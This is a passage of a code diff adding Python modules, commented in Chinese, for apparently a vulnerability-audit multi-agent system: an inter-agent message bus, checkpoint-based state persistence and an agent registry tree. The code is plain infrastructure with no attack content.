||||
return await self._executor.execute_parallel(tasks, agent_factory)
|
||||
|
||||
def get_child_results(self) -> Dict[str, Dict[str, Any]]:
|
||||
"""获取所有子 Agent 的结果"""
|
||||
return self._child_agents.copy()
|
||||
|
||||
def get_all_findings(self) -> List[Dict[str, Any]]:
|
||||
"""获取所有子 Agent 发现的漏洞"""
|
||||
findings = []
|
||||
for result in self._child_agents.values():
|
||||
if result.get("success") and result.get("data"):
|
||||
findings.extend(result["data"].get("findings", []))
|
||||
return findings
|
||||
|
|
@ -0,0 +1,290 @@
|
|||
"""
|
||||
Agent 间通信机制
|
||||
|
||||
提供:
|
||||
- 消息类型定义
|
||||
- 消息队列管理
|
||||
- Agent间消息传递
|
||||
"""
|
||||
|
||||
import logging
|
||||
import uuid
|
||||
from datetime import datetime, timezone
|
||||
from enum import Enum
|
||||
from typing import Any, Dict, List, Optional
|
||||
from dataclasses import dataclass, field
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class MessageType(str, Enum):
|
||||
"""消息类型"""
|
||||
QUERY = "query" # 查询消息(请求信息)
|
||||
INSTRUCTION = "instruction" # 指令消息(要求执行操作)
|
||||
INFORMATION = "information" # 信息消息(分享发现或状态)
|
||||
RESULT = "result" # 结果消息(任务完成报告)
|
||||
ERROR = "error" # 错误消息
|
||||
|
||||
|
||||
class MessagePriority(str, Enum):
|
||||
"""消息优先级"""
|
||||
LOW = "low"
|
||||
NORMAL = "normal"
|
||||
HIGH = "high"
|
||||
URGENT = "urgent"
|
||||
|
||||
|
||||
@dataclass
|
||||
class AgentMessage:
|
||||
"""
|
||||
Agent 消息
|
||||
|
||||
用于Agent间通信的消息结构
|
||||
"""
|
||||
id: str = field(default_factory=lambda: f"msg_{uuid.uuid4().hex[:8]}")
|
||||
from_agent: str = ""
|
||||
to_agent: str = ""
|
||||
content: str = ""
|
||||
message_type: MessageType = MessageType.INFORMATION
|
||||
priority: MessagePriority = MessagePriority.NORMAL
|
||||
timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
|
||||
|
||||
# 状态
|
||||
delivered: bool = False
|
||||
read: bool = False
|
||||
|
||||
# 附加数据
|
||||
metadata: Dict[str, Any] = field(default_factory=dict)
|
||||
|
||||
def to_dict(self) -> Dict[str, Any]:
|
||||
"""转换为字典"""
|
||||
return {
|
||||
"id": self.id,
|
||||
"from": self.from_agent,
|
||||
"to": self.to_agent,
|
||||
"content": self.content,
|
||||
"message_type": self.message_type.value if isinstance(self.message_type, MessageType) else self.message_type,
|
||||
"priority": self.priority.value if isinstance(self.priority, MessagePriority) else self.priority,
|
||||
"timestamp": self.timestamp,
|
||||
"delivered": self.delivered,
|
||||
"read": self.read,
|
||||
"metadata": self.metadata,
|
||||
}
|
||||
|
||||
@classmethod
|
||||
def from_dict(cls, data: Dict[str, Any]) -> "AgentMessage":
|
||||
"""从字典创建"""
|
||||
return cls(
|
||||
id=data.get("id", f"msg_{uuid.uuid4().hex[:8]}"),
|
||||
from_agent=data.get("from", ""),
|
||||
to_agent=data.get("to", ""),
|
||||
content=data.get("content", ""),
|
||||
message_type=MessageType(data.get("message_type", "information")),
|
||||
priority=MessagePriority(data.get("priority", "normal")),
|
||||
timestamp=data.get("timestamp", datetime.now(timezone.utc).isoformat()),
|
||||
delivered=data.get("delivered", False),
|
||||
read=data.get("read", False),
|
||||
metadata=data.get("metadata", {}),
|
||||
)
|
||||
|
||||
def to_xml(self) -> str:
|
||||
"""转换为XML格式(用于LLM理解)"""
|
||||
return f"""<inter_agent_message>
|
||||
<sender>
|
||||
<agent_id>{self.from_agent}</agent_id>
|
||||
</sender>
|
||||
<message_metadata>
|
||||
<type>{self.message_type.value if isinstance(self.message_type, MessageType) else self.message_type}</type>
|
||||
<priority>{self.priority.value if isinstance(self.priority, MessagePriority) else self.priority}</priority>
|
||||
<timestamp>{self.timestamp}</timestamp>
|
||||
</message_metadata>
|
||||
<content>
|
||||
{self.content}
|
||||
</content>
|
||||
</inter_agent_message>"""
|
||||
|
||||
|
||||
class MessageBus:
|
||||
"""
|
||||
消息总线
|
||||
|
||||
管理Agent间的消息传递
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self._queues: Dict[str, List[AgentMessage]] = {}
|
||||
self._message_history: List[AgentMessage] = []
|
||||
|
||||
def create_queue(self, agent_id: str) -> None:
|
||||
"""为Agent创建消息队列"""
|
||||
if agent_id not in self._queues:
|
||||
self._queues[agent_id] = []
|
||||
logger.debug(f"Created message queue for agent: {agent_id}")
|
||||
|
||||
def delete_queue(self, agent_id: str) -> None:
|
||||
"""删除Agent的消息队列"""
|
||||
if agent_id in self._queues:
|
||||
del self._queues[agent_id]
|
||||
logger.debug(f"Deleted message queue for agent: {agent_id}")
|
||||
|
||||
def send_message(
|
||||
self,
|
||||
from_agent: str,
|
||||
to_agent: str,
|
||||
content: str,
|
||||
message_type: MessageType = MessageType.INFORMATION,
|
||||
priority: MessagePriority = MessagePriority.NORMAL,
|
||||
metadata: Optional[Dict[str, Any]] = None,
|
||||
) -> AgentMessage:
|
||||
"""
|
||||
发送消息
|
||||
|
||||
Args:
|
||||
from_agent: 发送者Agent ID
|
||||
to_agent: 接收者Agent ID
|
||||
content: 消息内容
|
||||
message_type: 消息类型
|
||||
priority: 优先级
|
||||
metadata: 附加数据
|
||||
|
||||
Returns:
|
||||
发送的消息
|
||||
"""
|
||||
message = AgentMessage(
|
||||
from_agent=from_agent,
|
||||
to_agent=to_agent,
|
||||
content=content,
|
||||
message_type=message_type,
|
||||
priority=priority,
|
||||
metadata=metadata or {},
|
||||
)
|
||||
|
||||
# 确保目标队列存在
|
||||
if to_agent not in self._queues:
|
||||
self.create_queue(to_agent)
|
||||
|
||||
# 添加到队列
|
||||
self._queues[to_agent].append(message)
|
||||
message.delivered = True
|
||||
|
||||
# 记录历史
|
||||
self._message_history.append(message)
|
||||
|
||||
logger.debug(f"Message sent from {from_agent} to {to_agent}: {content[:50]}...")
|
||||
return message
|
||||
|
||||
def get_messages(
|
||||
self,
|
||||
agent_id: str,
|
||||
unread_only: bool = True,
|
||||
mark_as_read: bool = True,
|
||||
) -> List[AgentMessage]:
|
||||
"""
|
||||
获取Agent的消息
|
||||
|
||||
Args:
|
||||
agent_id: Agent ID
|
||||
unread_only: 是否只获取未读消息
|
||||
mark_as_read: 是否标记为已读
|
||||
|
||||
Returns:
|
||||
消息列表
|
||||
"""
|
||||
if agent_id not in self._queues:
|
||||
return []
|
||||
|
||||
messages = self._queues[agent_id]
|
||||
|
||||
if unread_only:
|
||||
messages = [m for m in messages if not m.read]
|
||||
|
||||
if mark_as_read:
|
||||
for m in messages:
|
||||
m.read = True
|
||||
|
||||
return messages
|
||||
|
||||
def has_unread_messages(self, agent_id: str) -> bool:
|
||||
"""检查是否有未读消息"""
|
||||
if agent_id not in self._queues:
|
||||
return False
|
||||
return any(not m.read for m in self._queues[agent_id])
|
||||
|
||||
def get_unread_count(self, agent_id: str) -> int:
|
||||
"""获取未读消息数量"""
|
||||
if agent_id not in self._queues:
|
||||
return 0
|
||||
return sum(1 for m in self._queues[agent_id] if not m.read)
|
||||
|
||||
def send_user_message(
|
||||
self,
|
||||
to_agent: str,
|
||||
content: str,
|
||||
priority: MessagePriority = MessagePriority.HIGH,
|
||||
) -> AgentMessage:
|
||||
"""发送用户消息到Agent"""
|
||||
return self.send_message(
|
||||
from_agent="user",
|
||||
to_agent=to_agent,
|
||||
content=content,
|
||||
message_type=MessageType.INSTRUCTION,
|
||||
priority=priority,
|
||||
)
|
||||
|
||||
def send_completion_report(
|
||||
self,
|
||||
from_agent: str,
|
||||
to_agent: str,
|
||||
summary: str,
|
||||
findings: List[Dict[str, Any]],
|
||||
success: bool = True,
|
||||
) -> AgentMessage:
|
||||
"""发送任务完成报告"""
|
||||
content = f"""<agent_completion_report>
|
||||
<status>{"SUCCESS" if success else "FAILED"}</status>
|
||||
<summary>{summary}</summary>
|
||||
<findings_count>{len(findings)}</findings_count>
|
||||
</agent_completion_report>"""
|
||||
|
||||
return self.send_message(
|
||||
from_agent=from_agent,
|
||||
to_agent=to_agent,
|
||||
content=content,
|
||||
message_type=MessageType.RESULT,
|
||||
priority=MessagePriority.HIGH,
|
||||
metadata={
|
||||
"summary": summary,
|
||||
"findings": findings,
|
||||
"success": success,
|
||||
},
|
||||
)
|
||||
|
||||
def clear_queue(self, agent_id: str) -> None:
|
||||
"""清空Agent的消息队列"""
|
||||
if agent_id in self._queues:
|
||||
self._queues[agent_id] = []
|
||||
|
||||
def clear_all(self) -> None:
|
||||
"""清空所有消息"""
|
||||
self._queues.clear()
|
||||
self._message_history.clear()
|
||||
|
||||
def get_message_history(
|
||||
self,
|
||||
agent_id: Optional[str] = None,
|
||||
limit: int = 100,
|
||||
) -> List[AgentMessage]:
|
||||
"""获取消息历史"""
|
||||
history = self._message_history
|
||||
|
||||
if agent_id:
|
||||
history = [
|
||||
m for m in history
|
||||
if m.from_agent == agent_id or m.to_agent == agent_id
|
||||
]
|
||||
|
||||
return history[-limit:]
|
||||
|
||||
|
||||
# 全局消息总线实例
|
||||
message_bus = MessageBus()
|
||||
|
|
@ -0,0 +1,413 @@
|
|||
"""
|
||||
Agent 状态持久化模块
|
||||
|
||||
提供 Agent 状态的持久化和恢复功能:
|
||||
- Agent 状态序列化和反序列化
|
||||
- 检查点保存和恢复
|
||||
- 消息历史持久化
|
||||
- 执行记录持久化
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, Any, List, Optional
|
||||
from pathlib import Path
|
||||
|
||||
from .state import AgentState, AgentStatus
|
||||
from .registry import agent_registry
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class AgentStatePersistence:
|
||||
"""
|
||||
Agent 状态持久化管理器
|
||||
|
||||
支持:
|
||||
- 文件系统持久化
|
||||
- 数据库持久化(可选)
|
||||
- 检查点机制
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
persist_dir: str = "./agent_checkpoints",
|
||||
use_database: bool = False,
|
||||
db_session_factory=None,
|
||||
):
|
||||
"""
|
||||
初始化持久化管理器
|
||||
|
||||
Args:
|
||||
persist_dir: 持久化目录
|
||||
use_database: 是否使用数据库持久化
|
||||
db_session_factory: 数据库会话工厂
|
||||
"""
|
||||
self.persist_dir = Path(persist_dir)
|
||||
self.use_database = use_database
|
||||
self.db_session_factory = db_session_factory
|
||||
|
||||
# 确保目录存在
|
||||
self.persist_dir.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
# ============ 文件系统持久化 ============
|
||||
|
||||
def save_state(self, state: AgentState, checkpoint_name: Optional[str] = None) -> str:
|
||||
"""
|
||||
保存 Agent 状态到文件
|
||||
|
||||
Args:
|
||||
state: Agent 状态
|
||||
checkpoint_name: 检查点名称(可选)
|
||||
|
||||
Returns:
|
||||
保存的文件路径
|
||||
"""
|
||||
# 生成文件名
|
||||
if checkpoint_name:
|
||||
filename = f"{state.agent_id}_{checkpoint_name}.json"
|
||||
else:
|
||||
timestamp = datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S")
|
||||
filename = f"{state.agent_id}_{timestamp}.json"
|
||||
|
||||
filepath = self.persist_dir / filename
|
||||
|
||||
# 序列化状态
|
||||
state_dict = self._serialize_state(state)
|
||||
|
||||
# 保存到文件
|
||||
with open(filepath, "w", encoding="utf-8") as f:
|
||||
json.dump(state_dict, f, ensure_ascii=False, indent=2)
|
||||
|
||||
logger.info(f"Saved agent state to {filepath}")
|
||||
return str(filepath)
|
||||
|
||||
def load_state(self, filepath: str) -> Optional[AgentState]:
|
||||
"""
|
||||
从文件加载 Agent 状态
|
||||
|
||||
Args:
|
||||
filepath: 文件路径
|
||||
|
||||
Returns:
|
||||
Agent 状态,如果加载失败返回 None
|
||||
"""
|
||||
try:
|
||||
with open(filepath, "r", encoding="utf-8") as f:
|
||||
state_dict = json.load(f)
|
||||
|
||||
state = self._deserialize_state(state_dict)
|
||||
logger.info(f"Loaded agent state from {filepath}")
|
||||
return state
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to load agent state from {filepath}: {e}")
|
||||
return None
|
||||
|
||||
def load_latest_checkpoint(self, agent_id: str) -> Optional[AgentState]:
|
||||
"""
|
||||
加载指定 Agent 的最新检查点
|
||||
|
||||
Args:
|
||||
agent_id: Agent ID
|
||||
|
||||
Returns:
|
||||
Agent 状态
|
||||
"""
|
||||
# 查找所有匹配的检查点文件
|
||||
pattern = f"{agent_id}_*.json"
|
||||
checkpoints = list(self.persist_dir.glob(pattern))
|
||||
|
||||
if not checkpoints:
|
||||
logger.warning(f"No checkpoints found for agent {agent_id}")
|
||||
return None
|
||||
|
||||
# 按修改时间排序,取最新的
|
||||
latest = max(checkpoints, key=lambda p: p.stat().st_mtime)
|
||||
return self.load_state(str(latest))
|
||||
|
||||
def list_checkpoints(self, agent_id: Optional[str] = None) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
列出检查点
|
||||
|
||||
Args:
|
||||
agent_id: Agent ID(可选,不指定则列出所有)
|
||||
|
||||
Returns:
|
||||
检查点信息列表
|
||||
"""
|
||||
if agent_id:
|
||||
pattern = f"{agent_id}_*.json"
|
||||
else:
|
||||
pattern = "*.json"
|
||||
|
||||
checkpoints = []
|
||||
for filepath in self.persist_dir.glob(pattern):
|
||||
stat = filepath.stat()
|
||||
checkpoints.append({
|
||||
"filepath": str(filepath),
|
||||
"filename": filepath.name,
|
||||
"size_bytes": stat.st_size,
|
||||
"created_at": datetime.fromtimestamp(stat.st_ctime, tz=timezone.utc).isoformat(),
|
||||
"modified_at": datetime.fromtimestamp(stat.st_mtime, tz=timezone.utc).isoformat(),
|
||||
})
|
||||
|
||||
# 按修改时间排序
|
||||
checkpoints.sort(key=lambda x: x["modified_at"], reverse=True)
|
||||
return checkpoints
|
||||
|
||||
def delete_checkpoint(self, filepath: str) -> bool:
|
||||
"""
|
||||
删除检查点
|
||||
|
||||
Args:
|
||||
filepath: 文件路径
|
||||
|
||||
Returns:
|
||||
是否删除成功
|
||||
"""
|
||||
try:
|
||||
os.remove(filepath)
|
||||
logger.info(f"Deleted checkpoint: {filepath}")
|
||||
return True
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to delete checkpoint {filepath}: {e}")
|
||||
return False
|
||||
|
||||
def cleanup_old_checkpoints(
|
||||
self,
|
||||
agent_id: str,
|
||||
keep_count: int = 5,
|
||||
) -> int:
|
||||
"""
|
||||
清理旧的检查点,只保留最新的几个
|
||||
|
||||
Args:
|
||||
agent_id: Agent ID
|
||||
keep_count: 保留的检查点数量
|
||||
|
||||
Returns:
|
||||
删除的检查点数量
|
||||
"""
|
||||
checkpoints = self.list_checkpoints(agent_id)
|
||||
|
||||
if len(checkpoints) <= keep_count:
|
||||
return 0
|
||||
|
||||
# 删除旧的检查点
|
||||
to_delete = checkpoints[keep_count:]
|
||||
deleted = 0
|
||||
|
||||
for cp in to_delete:
|
||||
if self.delete_checkpoint(cp["filepath"]):
|
||||
deleted += 1
|
||||
|
||||
return deleted
|
||||
|
||||
# ============ 序列化/反序列化 ============
|
||||
|
||||
def _serialize_state(self, state: AgentState) -> Dict[str, Any]:
|
||||
"""序列化 Agent 状态"""
|
||||
return {
|
||||
"version": "1.0",
|
||||
"serialized_at": datetime.now(timezone.utc).isoformat(),
|
||||
"state": state.model_dump(),
|
||||
}
|
||||
|
||||
def _deserialize_state(self, data: Dict[str, Any]) -> AgentState:
|
||||
"""反序列化 Agent 状态"""
|
||||
version = data.get("version", "1.0")
|
||||
state_data = data.get("state", data)
|
||||
|
||||
# 处理版本兼容性
|
||||
if version == "1.0":
|
||||
return AgentState(**state_data)
|
||||
else:
|
||||
logger.warning(f"Unknown state version: {version}, attempting to load anyway")
|
||||
return AgentState(**state_data)
|
||||
|
||||
# ============ 数据库持久化 ============
|
||||
|
||||
async def save_state_to_db(
|
||||
self,
|
||||
state: AgentState,
|
||||
task_id: str,
|
||||
) -> bool:
|
||||
"""
|
||||
保存 Agent 状态到数据库
|
||||
|
||||
Args:
|
||||
state: Agent 状态
|
||||
task_id: 关联的任务 ID
|
||||
|
||||
Returns:
|
||||
是否保存成功
|
||||
"""
|
||||
if not self.use_database or not self.db_session_factory:
|
||||
logger.warning("Database persistence not configured")
|
||||
return False
|
||||
|
||||
try:
|
||||
async with self.db_session_factory() as session:
|
||||
from app.models.agent_task import AgentCheckpoint
|
||||
|
||||
checkpoint = AgentCheckpoint(
|
||||
task_id=task_id,
|
||||
agent_id=state.agent_id,
|
||||
agent_name=state.agent_name,
|
||||
agent_type=state.agent_type,
|
||||
state_data=state.model_dump_json(),
|
||||
iteration=state.iteration,
|
||||
status=state.status,
|
||||
created_at=datetime.now(timezone.utc),
|
||||
)
|
||||
|
||||
session.add(checkpoint)
|
||||
await session.commit()
|
||||
|
||||
logger.info(f"Saved agent state to database: {state.agent_id}")
|
||||
return True
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to save agent state to database: {e}")
|
||||
return False
|
||||
|
||||
async def load_state_from_db(
|
||||
self,
|
||||
task_id: str,
|
||||
agent_id: Optional[str] = None,
|
||||
) -> Optional[AgentState]:
|
||||
"""
|
||||
从数据库加载 Agent 状态
|
||||
|
||||
Args:
|
||||
task_id: 任务 ID
|
||||
agent_id: Agent ID(可选)
|
||||
|
||||
Returns:
|
||||
Agent 状态
|
||||
"""
|
||||
if not self.use_database or not self.db_session_factory:
|
||||
logger.warning("Database persistence not configured")
|
||||
return None
|
||||
|
||||
try:
|
||||
async with self.db_session_factory() as session:
|
||||
from sqlalchemy import select
|
||||
from app.models.agent_task import AgentCheckpoint
|
||||
|
||||
query = select(AgentCheckpoint).where(
|
||||
AgentCheckpoint.task_id == task_id
|
||||
)
|
||||
|
||||
if agent_id:
|
||||
query = query.where(AgentCheckpoint.agent_id == agent_id)
|
||||
|
||||
query = query.order_by(AgentCheckpoint.created_at.desc()).limit(1)
|
||||
|
||||
result = await session.execute(query)
|
||||
checkpoint = result.scalar_one_or_none()
|
||||
|
||||
if checkpoint:
|
||||
state_data = json.loads(checkpoint.state_data)
|
||||
return AgentState(**state_data)
|
||||
|
||||
return None
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to load agent state from database: {e}")
|
||||
return None
|
||||
|
||||
|
||||
class CheckpointManager:
|
||||
"""
|
||||
检查点管理器
|
||||
|
||||
提供自动检查点功能:
|
||||
- 定期保存检查点
|
||||
- 错误恢复
|
||||
- 状态回滚
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
persistence: AgentStatePersistence,
|
||||
auto_checkpoint_interval: int = 5, # 每 N 次迭代自动保存
|
||||
):
|
||||
self.persistence = persistence
|
||||
self.auto_checkpoint_interval = auto_checkpoint_interval
|
||||
|
||||
self._last_checkpoint_iteration: Dict[str, int] = {}
|
||||
|
||||
def should_checkpoint(self, state: AgentState) -> bool:
|
||||
"""
|
||||
判断是否应该创建检查点
|
||||
|
||||
Args:
|
||||
state: Agent 状态
|
||||
|
||||
Returns:
|
||||
是否应该创建检查点
|
||||
"""
|
||||
last_iteration = self._last_checkpoint_iteration.get(state.agent_id, 0)
|
||||
return state.iteration - last_iteration >= self.auto_checkpoint_interval
|
||||
|
||||
def create_checkpoint(
|
||||
self,
|
||||
state: AgentState,
|
||||
checkpoint_name: Optional[str] = None,
|
||||
) -> str:
|
||||
"""
|
||||
创建检查点
|
||||
|
||||
Args:
|
||||
state: Agent 状态
|
||||
checkpoint_name: 检查点名称
|
||||
|
||||
Returns:
|
||||
检查点文件路径
|
||||
"""
|
||||
filepath = self.persistence.save_state(state, checkpoint_name)
|
||||
self._last_checkpoint_iteration[state.agent_id] = state.iteration
|
||||
return filepath
|
||||
|
||||
def auto_checkpoint(self, state: AgentState) -> Optional[str]:
|
||||
"""
|
||||
自动检查点(如果需要)
|
||||
|
||||
Args:
|
||||
state: Agent 状态
|
||||
|
||||
Returns:
|
||||
检查点文件路径,如果没有创建则返回 None
|
||||
"""
|
||||
if self.should_checkpoint(state):
|
||||
return self.create_checkpoint(state)
|
||||
return None
|
||||
|
||||
def restore_from_checkpoint(
|
||||
self,
|
||||
agent_id: str,
|
||||
checkpoint_filepath: Optional[str] = None,
|
||||
) -> Optional[AgentState]:
|
||||
"""
|
||||
从检查点恢复
|
||||
|
||||
Args:
|
||||
agent_id: Agent ID
|
||||
checkpoint_filepath: 检查点文件路径(可选,不指定则使用最新的)
|
||||
|
||||
Returns:
|
||||
恢复的 Agent 状态
|
||||
"""
|
||||
if checkpoint_filepath:
|
||||
return self.persistence.load_state(checkpoint_filepath)
|
||||
else:
|
||||
return self.persistence.load_latest_checkpoint(agent_id)
|
||||
|
||||
|
||||
# 全局持久化管理器
|
||||
agent_persistence = AgentStatePersistence()
|
||||
checkpoint_manager = CheckpointManager(agent_persistence)
|
||||
|
|
@ -0,0 +1,309 @@
|
|||
"""
|
||||
Agent 注册表和动态Agent树管理
|
||||
|
||||
提供:
|
||||
- Agent实例注册和管理
|
||||
- 动态Agent树结构
|
||||
- Agent状态追踪
|
||||
- 子Agent创建和销毁
|
||||
"""
|
||||
|
||||
import logging
|
||||
import threading
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Dict, List, Optional, TYPE_CHECKING
|
||||
|
||||
if TYPE_CHECKING:
|
||||
from .state import AgentState
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class AgentRegistry:
|
||||
"""
|
||||
Agent 注册表
|
||||
|
||||
管理所有Agent实例,维护动态Agent树结构
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self._lock = threading.RLock()
|
||||
|
||||
# Agent图结构
|
||||
self._agent_graph: Dict[str, Any] = {
|
||||
"nodes": {}, # agent_id -> node_info
|
||||
"edges": [], # {from, to, type}
|
||||
}
|
||||
|
||||
# Agent实例和状态
|
||||
self._agent_instances: Dict[str, Any] = {} # agent_id -> agent_instance
|
||||
self._agent_states: Dict[str, "AgentState"] = {} # agent_id -> state
|
||||
|
||||
# 消息队列
|
||||
self._agent_messages: Dict[str, List[Dict[str, Any]]] = {} # agent_id -> messages
|
||||
|
||||
# 根Agent
|
||||
self._root_agent_id: Optional[str] = None
|
||||
|
||||
# 运行中的Agent线程
|
||||
self._running_agents: Dict[str, threading.Thread] = {}
|
||||
|
||||
# ============ Agent 注册 ============
|
||||
|
||||
def register_agent(
|
||||
self,
|
||||
agent_id: str,
|
||||
agent_name: str,
|
||||
agent_type: str,
|
||||
task: str,
|
||||
parent_id: Optional[str] = None,
|
||||
agent_instance: Any = None,
|
||||
state: Optional["AgentState"] = None,
|
||||
knowledge_modules: Optional[List[str]] = None,
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
注册Agent到注册表
|
||||
|
||||
Args:
|
||||
agent_id: Agent唯一标识
|
||||
agent_name: Agent名称
|
||||
agent_type: Agent类型
|
||||
task: 任务描述
|
||||
parent_id: 父Agent ID
|
||||
agent_instance: Agent实例
|
||||
state: Agent状态
|
||||
knowledge_modules: 加载的知识模块
|
||||
|
||||
Returns:
|
||||
注册的节点信息
|
||||
"""
|
||||
logger.info(f"[AgentRegistry] register_agent 被调用: {agent_name} (id={agent_id}, parent={parent_id})")
|
||||
logger.info(f"[AgentRegistry] 当前节点数: {len(self._agent_graph['nodes'])}, 节点列表: {list(self._agent_graph['nodes'].keys())}")
|
||||
|
||||
with self._lock:
|
||||
node = {
|
||||
"id": agent_id,
|
||||
"name": agent_name,
|
||||
"type": agent_type,
|
||||
"task": task,
|
||||
"status": "running",
|
||||
"parent_id": parent_id,
|
||||
"created_at": datetime.now(timezone.utc).isoformat(),
|
||||
"finished_at": None,
|
||||
"result": None,
|
||||
"knowledge_modules": knowledge_modules or [],
|
||||
"children": [],
|
||||
}
|
||||
|
||||
self._agent_graph["nodes"][agent_id] = node
|
||||
|
||||
if agent_instance:
|
||||
self._agent_instances[agent_id] = agent_instance
|
||||
|
||||
if state:
|
||||
self._agent_states[agent_id] = state
|
||||
|
||||
# 初始化消息队列
|
||||
if agent_id not in self._agent_messages:
|
||||
self._agent_messages[agent_id] = []
|
||||
|
||||
# 添加边(父子关系)
|
||||
if parent_id:
|
||||
self._agent_graph["edges"].append({
|
||||
"from": parent_id,
|
||||
"to": agent_id,
|
||||
"type": "delegation",
|
||||
"created_at": datetime.now(timezone.utc).isoformat(),
|
||||
})
|
||||
|
||||
# 更新父节点的children列表
|
||||
if parent_id in self._agent_graph["nodes"]:
|
||||
self._agent_graph["nodes"][parent_id]["children"].append(agent_id)
|
||||
|
||||
# 设置根Agent
|
||||
if parent_id is None and self._root_agent_id is None:
|
||||
self._root_agent_id = agent_id
|
||||
|
||||
logger.info(f"[AgentRegistry] 注册完成: {agent_name} ({agent_id}), parent: {parent_id}")
|
||||
logger.info(f"[AgentRegistry] 注册后节点数: {len(self._agent_graph['nodes'])}, 节点列表: {list(self._agent_graph['nodes'].keys())}")
|
||||
return node
|
||||
|
||||
def unregister_agent(self, agent_id: str) -> None:
|
||||
"""注销Agent"""
|
||||
with self._lock:
|
||||
if agent_id in self._agent_graph["nodes"]:
|
||||
del self._agent_graph["nodes"][agent_id]
|
||||
|
||||
self._agent_instances.pop(agent_id, None)
|
||||
self._agent_states.pop(agent_id, None)
|
||||
self._agent_messages.pop(agent_id, None)
|
||||
self._running_agents.pop(agent_id, None)
|
||||
|
||||
# 移除相关边
|
||||
self._agent_graph["edges"] = [
|
||||
e for e in self._agent_graph["edges"]
|
||||
if e["from"] != agent_id and e["to"] != agent_id
|
||||
]
|
||||
|
||||
logger.info(f"Unregistered agent: {agent_id}")
|
||||
|
||||
# ============ Agent 状态更新 ============
|
||||
|
||||
def update_agent_status(
|
||||
self,
|
||||
agent_id: str,
|
||||
status: str,
|
||||
result: Optional[Dict[str, Any]] = None,
|
||||
) -> None:
|
||||
"""更新Agent状态"""
|
||||
with self._lock:
|
||||
if agent_id in self._agent_graph["nodes"]:
|
||||
node = self._agent_graph["nodes"][agent_id]
|
||||
node["status"] = status
|
||||
|
||||
if status in ["completed", "failed", "stopped"]:
|
||||
node["finished_at"] = datetime.now(timezone.utc).isoformat()
|
||||
|
||||
if result:
|
||||
node["result"] = result
|
||||
|
||||
logger.debug(f"Updated agent {agent_id} status to {status}")
|
||||
|
||||
def get_agent_status(self, agent_id: str) -> Optional[str]:
|
||||
"""获取Agent状态"""
|
||||
with self._lock:
|
||||
if agent_id in self._agent_graph["nodes"]:
|
||||
return self._agent_graph["nodes"][agent_id]["status"]
|
||||
return None
|
||||
|
||||
# ============ Agent 查询 ============
|
||||
|
||||
def get_agent(self, agent_id: str) -> Optional[Any]:
|
||||
"""获取Agent实例"""
|
||||
return self._agent_instances.get(agent_id)
|
||||
|
||||
def get_agent_state(self, agent_id: str) -> Optional["AgentState"]:
|
||||
"""获取Agent状态"""
|
||||
return self._agent_states.get(agent_id)
|
||||
|
||||
def get_agent_node(self, agent_id: str) -> Optional[Dict[str, Any]]:
|
||||
"""获取Agent节点信息"""
|
||||
return self._agent_graph["nodes"].get(agent_id)
|
||||
|
||||
def get_root_agent_id(self) -> Optional[str]:
|
||||
"""获取根Agent ID"""
|
||||
return self._root_agent_id
|
||||
|
||||
def get_children(self, agent_id: str) -> List[str]:
|
||||
"""获取子Agent ID列表"""
|
||||
with self._lock:
|
||||
node = self._agent_graph["nodes"].get(agent_id)
|
||||
if node:
|
||||
return node.get("children", [])
|
||||
return []
|
||||
|
||||
def get_parent(self, agent_id: str) -> Optional[str]:
|
||||
"""获取父Agent ID"""
|
||||
with self._lock:
|
||||
node = self._agent_graph["nodes"].get(agent_id)
|
||||
if node:
|
||||
return node.get("parent_id")
|
||||
return None
|
||||
|
||||
# ============ Agent 树操作 ============
|
||||
|
||||
def get_agent_tree(self) -> Dict[str, Any]:
|
||||
"""获取完整的Agent树结构"""
|
||||
with self._lock:
|
||||
return {
|
||||
"nodes": dict(self._agent_graph["nodes"]),
|
||||
"edges": list(self._agent_graph["edges"]),
|
||||
"root_agent_id": self._root_agent_id,
|
||||
}
|
||||
|
||||
def get_agent_tree_view(self, agent_id: Optional[str] = None) -> str:
|
||||
"""获取Agent树的文本视图"""
|
||||
with self._lock:
|
||||
lines = ["=== AGENT TREE ==="]
|
||||
|
||||
root_id = agent_id or self._root_agent_id
|
||||
if not root_id or root_id not in self._agent_graph["nodes"]:
|
||||
return "No agents in the tree"
|
||||
|
||||
def _build_tree(aid: str, depth: int = 0) -> None:
|
||||
node = self._agent_graph["nodes"].get(aid)
|
||||
if not node:
|
||||
return
|
||||
|
||||
indent = " " * depth
|
||||
status_emoji = {
|
||||
"running": "🔄",
|
||||
"waiting": "⏳",
|
||||
"completed": "✅",
|
||||
"failed": "❌",
|
||||
"stopped": "🛑",
|
||||
}.get(node["status"], "❓")
|
||||
|
||||
lines.append(f"{indent}{status_emoji} {node['name']} ({aid})")
|
||||
lines.append(f"{indent} Task: {node['task'][:50]}...")
|
||||
lines.append(f"{indent} Status: {node['status']}")
|
||||
|
||||
if node.get("knowledge_modules"):
|
||||
lines.append(f"{indent} Modules: {', '.join(node['knowledge_modules'])}")
|
||||
|
||||
for child_id in node.get("children", []):
|
||||
_build_tree(child_id, depth + 1)
|
||||
|
||||
_build_tree(root_id)
|
||||
return "\n".join(lines)
|
||||
|
||||
def get_statistics(self) -> Dict[str, int]:
|
||||
"""获取统计信息"""
|
||||
with self._lock:
|
||||
stats = {
|
||||
"total": len(self._agent_graph["nodes"]),
|
||||
"running": 0,
|
||||
"waiting": 0,
|
||||
"completed": 0,
|
||||
"failed": 0,
|
||||
"stopped": 0,
|
||||
}
|
||||
|
||||
